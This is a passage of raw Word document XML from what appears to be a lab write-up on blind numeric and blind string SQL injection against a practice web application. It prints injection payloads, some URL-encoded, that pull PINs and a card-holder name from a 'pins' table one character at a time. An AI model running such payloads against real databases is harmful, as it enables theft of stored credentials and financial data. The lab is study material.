        <w:tblW w:w="4965.0" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="1555.0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4965"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="4965"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="282c34"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Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="abb2bf"/>
                <w:shd w:fill="282c34" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">101 AND 1=((</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="c678dd"/>
                <w:shd w:fill="282c34" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">SELECT</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="abb2bf"/>
                <w:shd w:fill="282c34" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> pin </w:t>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pins </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="c678dd"/>
                <w:shd w:fill="282c34" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">WHERE</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="abb2bf"/>
                <w:shd w:fill="282c34" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> cc_number=</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="98c379"/>
                <w:shd w:fill="282c34" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">'1111222233334444'</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="abb2bf"/>
                <w:shd w:fill="282c34" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">)=$ )</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000025">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We encode it as:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table4"/>
        <w:tblW w:w="8325.0" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="1570.0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8325"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="8325"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="282c34"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Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="abb2bf"/>
                <w:shd w:fill="282c34" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">101%20AND%201%3D((</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="c678dd"/>
                <w:shd w:fill="282c34" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">SELECT</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20</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="abb2bf"/>
                <w:shd w:fill="282c34" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">pin%</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="d19a66"/>
                <w:shd w:fill="282c34" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">20</w:t>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20</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="abb2bf"/>
                <w:shd w:fill="282c34" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">pins%</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="d19a66"/>
                <w:shd w:fill="282c34" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">20</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="c678dd"/>
                <w:shd w:fill="282c34" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">WHERE</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20</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="abb2bf"/>
                <w:shd w:fill="282c34" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">cc_number%</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D</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="98c379"/>
                <w:shd w:fill="282c34" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">'1111222233334444'</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D%</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="d19a66"/>
                <w:shd w:fill="282c34" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">20</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="abb2bf"/>
                <w:shd w:fill="282c34" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">$)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000027">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The range is  set from 500 to 5000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000028">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5305954" cy="3348038"/>
            <wp:effectExtent b="12700" l="12700" r="12700" t="12700"/>
            <wp:docPr id="4" name="image16.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image16.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:srcRect b="15044" l="29162" r="7475" t="14454"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5305954" cy="3348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ind w:left="1440" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Output</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002A">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4272849" cy="1062038"/>
            <wp:effectExtent b="12700" l="12700" r="12700" t="12700"/>
            <wp:docPr id="12" name="image28.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image28.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:srcRect b="20648" l="21760" r="49501" t="66666"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4272849" cy="1062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ind w:left="1440" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="1754267" cy="661988"/>
            <wp:effectExtent b="12700" l="12700" r="12700" t="12700"/>
            <wp:docPr id="6" name="image21.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image21.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:srcRect b="8554" l="6478" r="84717" t="85545"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1754267" cy="661988"/>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C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Blind String SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002D">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Similarly to Blind Numeric SQL Injection, we use jHijack to carry out Blind String SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002E">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Statement used (HijackID):</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table5"/>
        <w:tblW w:w="7560.0" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="1555.0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7560"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="7560"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="282c34"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Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="abb2bf"/>
                <w:shd w:fill="282c34" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">account_number=101 AND ((</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="c678dd"/>
                <w:shd w:fill="282c34" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">SELECT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ASCII</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SUBSTR</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c678dd"/>
                <w:shd w:fill="282c34" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">name</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pins </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="c678dd"/>
                <w:shd w:fill="282c34" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">WHERE</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="abb2bf"/>
                <w:shd w:fill="282c34" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> cc_number=</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="98c379"/>
                <w:shd w:fill="282c34" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">'4321432143214321'</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="abb2bf"/>
                <w:shd w:fill="282c34" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">)=$ )</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000030">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4908842" cy="2767013"/>
            <wp:effectExtent b="12700" l="12700" r="12700" t="12700"/>
            <wp:docPr id="13" name="image29.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image29.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:srcRect b="14159" l="15282" r="14285" t="15339"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4908842" cy="2767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ind w:left="1440" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First alphabet’s ASCII code:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000032">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3359944" cy="395288"/>
            <wp:effectExtent b="12700" l="12700" r="12700" t="12700"/>
            <wp:docPr id="9" name="image25.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image25.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:srcRect b="19469" l="31561" r="40199" t="74631"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3359944" cy="3952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ind w:left="1440" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Similarly, by changing the substring position from 1,1 to 2,1 and subsequently 3,4, and 5. At “SUBSTR(name,5,1)” we get no result indicating that the name is 4 characters long</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000034">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Our ASCII codes are: 74,105,108, and 108 which translate to “Jill”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000035">
      <w:pPr>
        <w:ind w:left="1417.3228346456694" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4269105" cy="900113"/>
            <wp:effectExtent b="12700" l="12700" r="12700" t="12700"/>
            <wp:docPr id="14" name="image30.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image30.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:srcRect b="18584" l="21096" r="51328" t="71091"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4269105" cy="900113"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln w="12700">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:footerReference r:id="rId22"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sz w:val="22"/>
        <w:szCs w:val="2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11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId12"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15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.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29.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId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